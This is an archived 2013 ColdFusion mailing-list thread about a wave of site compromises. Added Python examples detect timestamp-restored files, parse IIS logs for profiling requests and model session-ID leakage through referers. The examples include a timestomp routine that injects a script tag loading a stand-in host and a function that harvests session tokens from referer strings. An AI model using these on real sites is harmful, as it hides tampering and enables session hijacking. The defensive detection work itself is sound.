Re: New Round of Exploits going on

2013-02-10 Thread Andrew Scott

That would indicate that they were able to get the file stamp before
modifying it and reapplying the time stamp. Extremely long shot, but who
knows how they are doing this.

-- 
Regards,
Andrew Scott
WebSite: http://www.andyscott.id.au/
Google+:  http://plus.google.com/113032480415921517411


On Mon, Feb 11, 2013 at 4:43 PM, Les Mizzell wrote:

>
>  > Still I am not sure how they are uploading these files
>  > as there is nothing in the logs that indicates this.
>
> For mine in the previous message, the altered file still had the
> ORIGINAL creation date on it - 2011 something - although it was altered
> last week. So, a search of all the site files for anything recently
> altered showed nothing.
>
> 

~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354447
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
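The move Andrew describes (read the timestamp, edit the file, put the timestamp back) is one utime() call, and it defeats any "recently modified" search. The Python below is an added example, not code from anyone on this thread, showing two checks that survive it, run against a throwaway site tree it builds itself. On Linux/Unix the inode change time (ctime) cannot be set from user space and is bumped by the utime() call itself, so a ctime far ahead of mtime marks a file that was touched after its recorded modification time. A SHA-256 manifest taken from a known-good copy catches content changes without trusting timestamps at all. On Windows Python's st_ctime is the creation time, so only the manifest check applies there. The file names, the 2011 date and the injected script tag are constructed.

```python
"""Catch a file that was edited and then had its old mtime put back.

Added example for this thread, not code from the original posts. Two checks
that a "recently modified" search cannot do:
  ctime_after_mtime(): on Linux/Unix utime() rewrites atime/mtime but the
      kernel sets ctime itself, on that very call, so ctime far ahead of
      mtime means the file changed after its recorded modification time.
      (On Windows st_ctime is the creation time; skip this check there.)
  manifest_diff(): SHA-256 of every file against a known-good manifest,
      which ignores timestamps entirely.
The site tree, the 2011 date and the injected tag are all constructed here.
"""
import hashlib
import os
import tempfile
import time
from pathlib import Path

SLACK_SECONDS = 2  # a normal write sets mtime and ctime to the same instant


def ctime_after_mtime(root, slack=SLACK_SECONDS):
    """Relative paths under root whose ctime exceeds mtime by more than slack."""
    root = Path(root)
    hits = []
    for p in root.rglob("*"):
        if p.is_file():
            st = p.stat()
            if st.st_ctime - st.st_mtime > slack:
                hits.append(str(p.relative_to(root)))
    return sorted(hits)


def sha256_manifest(root):
    """Relative path -> SHA-256 hex digest for every file under root."""
    root = Path(root)
    return {str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}


def manifest_diff(baseline, current):
    """(changed, added, removed) relative paths between two manifests."""
    changed = sorted(k for k in baseline if k in current and baseline[k] != current[k])
    added = sorted(k for k in current if k not in baseline)
    removed = sorted(k for k in baseline if k not in current)
    return changed, added, removed


def timestomp(path, old_mtime):
    """The attacker's move: append a payload, then restore the old timestamps."""
    with open(path, "ab") as f:
        f.write(b'<script src="http://somedomain/x.js"></script>\n')  # constructed payload
    os.utime(path, (old_mtime, old_mtime))  # sets atime and mtime; ctime is not ours to set


def demo():
    """Build a two-file site, baseline it, tamper with one file, run both checks."""
    root = Path(tempfile.mkdtemp())
    index, about = root / "index.html", root / "about.html"
    index.write_text("<html>home</html>\n")
    about.write_text("<html>about</html>\n")
    # Backdate index.html to 2011 like the file in the thread. Doing so needs
    # utime() too, so its ctime is already "now"; on a real server the old
    # file would have an old ctime and the gap would come only from the attack.
    old = time.mktime((2011, 6, 1, 12, 0, 0, 0, 0, -1))
    os.utime(index, (old, old))
    baseline = sha256_manifest(root)

    timestomp(index, old)  # content changes, mtime still says 2011

    changed, added, removed = manifest_diff(baseline, sha256_manifest(root))
    return {
        "mtime_still_2011": abs(index.stat().st_mtime - old) < 1,  # True: a date search misses it
        "ctime_vs_mtime": ctime_after_mtime(root),                 # ['index.html'] on Linux/Unix
        "hash_changed": changed,                                   # ['index.html'] anywhere
        "hash_added": added,
        "hash_removed": removed,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The manifest is the check to keep: build it from a clean deployment (or the repository) rather than from the live server, and run the comparison from a host the attacker does not control, since a manifest stored next to the site can be rewritten along with the files.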


Re: New Round of Exploits going on

2013-02-10 Thread Les Mizzell

 > Still I am not sure how they are uploading these files
 > as there is nothing in the logs that indicates this.

For mine in the previous message, the altered file still had the 
ORIGINAL creation date on it - 2011 something - although it was altered 
last week. So, a search of all the site files for anything recently 
altered showed nothing.

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354446


Re: New Round of Exploits going on

2013-02-10 Thread Andrew Scott

One thing I hate about some hosting companies is that they have Robust
Exceptions switched on, but what concerns me even more is that they don't
care that this is a security risk... If your hosting company is one of
them, get in their ears about having it switched off.

If they refuse, then it's time for a change.

Also, as a caution not a rule: if you're lucky enough to have the time, look
into using any framework that supports MVC and SES rewrites. This has
stopped them in their tracks, as they are not able to run the uploaded code.
Not with ease, at least.

Still I am not sure how they are uploading these files, as there is nothing
in the logs that indicates this. I am guessing that something else on the
server is compromised and, because they are able to and do look for
exceptions being displayed to the screen, they now know where to start
spreading their malware. My guess is there is an exploit still known and not
public that is bypassing all sandboxing at the moment.


-- 
Regards,
Andrew Scott
WebSite: http://www.andyscott.id.au/
Google+:  http://plus.google.com/113032480415921517411


Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354445


Re: New Round of Exploits going on

2013-02-10 Thread Les Mizzell

I just got the below on a site. Not sure how to decrypt it to tell exactly
what it's doing though.
Client noticed that Google had flagged the site as "compromised".

I'm pointing my finger at the hosting company - they've got a security 
issue if this can happen, correct?

So, anybody know what this is doing?

-

Allaire Cold Fusion Template
Header Size: New 
Version
[binary body of the encoded template; the remainder of the message is not reproducible as text]

New Round of Exploits going on

2013-02-10 Thread Andrew Scott

It appears that there are either Web Developers running sites with current
infections, or there is a new round happening.

I have seen one site hacked twice in the last two weeks, and although they
were never able to run the code, there is very little evidence that this
exploit is from the web site it was found on.

However the one thing that I noticed in the logs at the time of the
modified HTML file, and yes they only modified HTML files and not CFML
files, was that I found a HEAD request in the logs that came from a website
that looked suspicious. When I googled this domain my AntiVirus detected
this as a Black Hole Security Exploit, but what was worrying was that this
log with the domain had the website that was hacked in the log. And it
looks like this with the details changed to protect both parties.

2013-02-06 01:43:48 xxx.xxx.xxx.xxx HEAD / - 80 - xxx.xxx.xxx.xxx Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:18.0)+Gecko/20100101+Firefox/18.0 http://somedomain/?info/domainattacked 301 0 0 225 432 125

Now you can see that this was redirected, but if there is a known exploit
these guys are still able to do this. As was evident with the latest
Anonymous attacks.

I encourage people to look at their websites and check to see if they have
been infected with this new wave. I have gone through the logs of the
website in question and there is no evidence that it was infected directly
through the website, except for that one line in the log mentioned above.

What really shocks me even more is that the hosting company refuse
to acknowledge that they may be responsible, which is fair enough if this
website did not have all the checks to sanitize all form inputs with
AntiSamy. And there is also no evidence that this is a SQL injection attack
either, which is near impossible unless there is a known bug with Hibernate
and its current binding of variables, a.k.a. cfqueryparam for Hibernate.

Anyway as some people have mentioned that they have been attacked in the
last few weeks, I wanted to share this as there seems to be a new exploit
going around that may or may not be related to ColdFusion on shared hosts,
but they seem to not care who they are infecting.


-- 
Regards,
Andrew Scott
WebSite: http://www.andyscott.id.au/
Google+:  http://plus.google.com/113032480415921517411


Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354443
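The line Andrew quotes is in IIS W3C extended format, and the tell in it is not the HEAD method or the 301 but the Referer: a request arriving from another host whose URL carries the hacked site's own hostname, meaning the site was handed to something by name. As an added example (not code from this thread), the Python below parses a W3C log using its own #Fields: header, flags entries with that referer pattern, and lists the distinct off-site referer hosts so they can be looked up the way Andrew looked his up. The log lines, the IPs (documentation ranges) and the victim hostname are constructed; "somedomain" is the placeholder from the original post.

```python
"""Find the profiling request Andrew quotes in an IIS W3C log.

Added example, not code from the original message. The tell in the quoted
line is not the HEAD method or the 301 but the Referer: a request that
arrives from another host whose URL carries this site's own hostname
(http://somedomain/?info/<attacked domain>), i.e. the site was fed to some
kit by name. Log lines, IPs (documentation ranges) and hostnames are
constructed; "somedomain" is the placeholder from the original post.
"""
from urllib.parse import urlsplit

SITE_HOST = "victim.example"  # assumption: hostname of the hacked site

SAMPLE_LOG = """#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status sc-bytes cs-bytes time-taken
2013-02-06 01:43:40 192.0.2.10 GET /index.cfm - 80 - 198.51.100.7 Mozilla/5.0+(Windows+NT+6.1)+Firefox/18.0 http://victim.example/ 200 0 0 5120 410 31
2013-02-06 01:43:48 192.0.2.10 HEAD / - 80 - 198.51.100.23 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:18.0)+Gecko/20100101+Firefox/18.0 http://somedomain/?info/victim.example 301 0 0 225 432 125
2013-02-06 01:44:02 192.0.2.10 GET /products.cfm id=7 80 - 198.51.100.9 Mozilla/5.0+(Windows+NT+6.1)+Chrome/24.0 http://www.google.com/search?q=widgets 200 0 0 9200 520 47
"""


def parse_w3c(text):
    """Yield one dict per log entry, keyed by the names in the #Fields: line."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # IIS escapes spaces inside values as '+'
        elif line.startswith("#") or not line.strip() or fields is None:
            continue
        else:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))


def is_profiling_request(entry, site_host=SITE_HOST):
    """Off-site Referer that names this site: the domain was handed to a kit."""
    ref = entry.get("cs(Referer)", "-")
    if ref == "-":
        return False
    host = (urlsplit(ref).hostname or "").lower()
    return host != site_host.lower() and site_host.lower() in ref.lower()


def suspicious_entries(text, site_host=SITE_HOST):
    """Entries matching the pattern; their c-ip and Referer host are the leads."""
    return [e for e in parse_w3c(text) if is_profiling_request(e, site_host)]


def offsite_referer_hosts(text, site_host=SITE_HOST):
    """Distinct Referer hosts other than our own, for a reputation lookup."""
    hosts = set()
    for e in parse_w3c(text):
        ref = e.get("cs(Referer)", "-")
        host = (urlsplit(ref).hostname or "").lower() if ref != "-" else ""
        if host and host != site_host.lower():
            hosts.add(host)
    return sorted(hosts)


if __name__ == "__main__":
    for e in suspicious_entries(SAMPLE_LOG):
        print(e["date"], e["time"], e["c-ip"], e["cs-method"], e["cs(Referer)"], e["sc-status"])
    print("off-site referer hosts:", offsite_referer_hosts(SAMPLE_LOG))
```

A Referer is client-supplied, so the match only says someone sent a request claiming that origin; the c-ip on the matching entry and the rest of that client's requests around the same time are what to pull next. Run it over the whole day's logs, not only the minute the file changed, since the file's mtime was not trustworthy in this case.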


Re: Anyway to automatically convert to URLSESSIONFORMAT

2013-02-10 Thread Cameron Childress

On Sat, Feb 9, 2013 at 7:55 PM, UXB wrote:

> From a security perspective cookies are a better option because passing
> IDs in the open can result in session hijacking when someone bookmarks a
> link.
>

This isn't even the biggest threat. Since you are passing the SessionID in
the URL, it will be included in the referrer string and LOGGED by someone
else's server each time you allow a link out from your website. This
appears to be the root cause of the recent Yahoo Mail security breaches.

This means if you simply link to my website from yours, using a plain-Jane
link, this is all that is required for me to potentially hijack your
users' sessions, simply by examining the referrer strings.

-Cameron

-- 
Cameron Childress
--
p:   678.637.5072
im: cameroncf


Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354442
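What the other server logs is decided by the browser's Referrer-Policy rules, so Cameron's point can be shown end to end. The Python below is an added example, not code from this thread. referer_sent() applies the policy rules to a click from a page to a link and returns the Referer value the target site would log; harvest_session() is the receiving side, pulling CFID/CFTOKEN (the pair URLSessionFormat appends) or a jsessionid path parameter back out of that value. It goes beyond the specific case in the text by covering the policies in use: no-referrer-when-downgrade is what browsers did when this thread was written, and strict-origin-when-cross-origin is what current browsers default to. Hostnames and token values are constructed.

```python
"""How a session ID in the URL ends up in another site's logs, and what stops it.

Added example for this thread, not code from the original posts. Two parts:
  referer_sent()    applies the browser Referrer-Policy rules to a link click
                    and returns the Referer value the other site would log.
  harvest_session() is the receiving site's side: pull CFID/CFTOKEN (what
                    URLSessionFormat appends) or a jsessionid out of a Referer.
Hostnames and token values are constructed.
"""
from urllib.parse import parse_qs, urlsplit


def _origin(parts):
    """scheme://host[:port]/ as browsers send it for origin-only referers."""
    netloc = parts.hostname or ""
    if parts.port:
        netloc += f":{parts.port}"
    return f"{parts.scheme}://{netloc}/"


def _full(parts):
    """Full referer: browsers drop the fragment and any userinfo, keep the query."""
    url = _origin(parts).rstrip("/") + (parts.path or "/")
    if parts.query:
        url += "?" + parts.query
    return url


def referer_sent(page_url, link_url, policy="no-referrer-when-downgrade"):
    """Referer header sent when a link on page_url to link_url is clicked.

    Returns None when the header is omitted. Implements the six policies
    named below; anything else raises.
    """
    page, link = urlsplit(page_url), urlsplit(link_url)
    same_origin = _origin(page) == _origin(link)
    downgrade = page.scheme == "https" and link.scheme == "http"
    if policy == "no-referrer":
        return None
    if policy == "unsafe-url":
        return _full(page)
    if policy == "same-origin":
        return _full(page) if same_origin else None
    if policy == "origin":
        return _origin(page)
    if policy == "no-referrer-when-downgrade":
        return None if downgrade else _full(page)
    if policy == "strict-origin-when-cross-origin":
        if same_origin:
            return _full(page)
        return None if downgrade else _origin(page)
    raise ValueError(f"unknown policy {policy!r}")


SESSION_KEYS = ("cfid", "cftoken", "jsessionid")


def harvest_session(referer):
    """Session identifiers found in a Referer value, keyed by lower-case name."""
    if not referer:
        return {}
    parts = urlsplit(referer)
    found = {}
    # ;jsessionid=... is a path parameter, so it is not in the query string
    for segment in parts.path.split("/"):
        if ";" in segment:
            for param in segment.split(";")[1:]:
                name, _, value = param.partition("=")
                if name.lower() in SESSION_KEYS:
                    found[name.lower()] = value
    for name, values in parse_qs(parts.query).items():
        if name.lower() in SESSION_KEYS:
            found[name.lower()] = values[0]
    return found


def demo():
    """A URLSessionFormat-style page linking out, under several policies."""
    page = "http://shop.example/cart.cfm?CFID=1234&CFTOKEN=98765432&item=7"
    link = "http://partner.example/"
    return {
        "2013_default": harvest_session(referer_sent(page, link)),
        "modern_default": harvest_session(
            referer_sent(page, link, "strict-origin-when-cross-origin")),
        "https_to_http": harvest_session(
            referer_sent("https://shop.example/a.cfm?CFID=1&CFTOKEN=2", link)),
        "j2ee_path_param": harvest_session("http://shop.example/a.cfm;jsessionid=ABC123?x=1"),
    }


if __name__ == "__main__":
    for case, tokens in demo().items():
        print(f"{case}: {tokens}")
```

Keeping the session in cookies, so it is never in the URL, removes the problem at the source. For pages that still carry it, a Referrer-Policy of no-referrer or strict-origin-when-cross-origin, or rel="noreferrer" on outbound links, limits what leaks; note that same-origin links still send the full URL under the modern default, so anything on your own origin that logs referers (or an injected script on it) still sees the tokens.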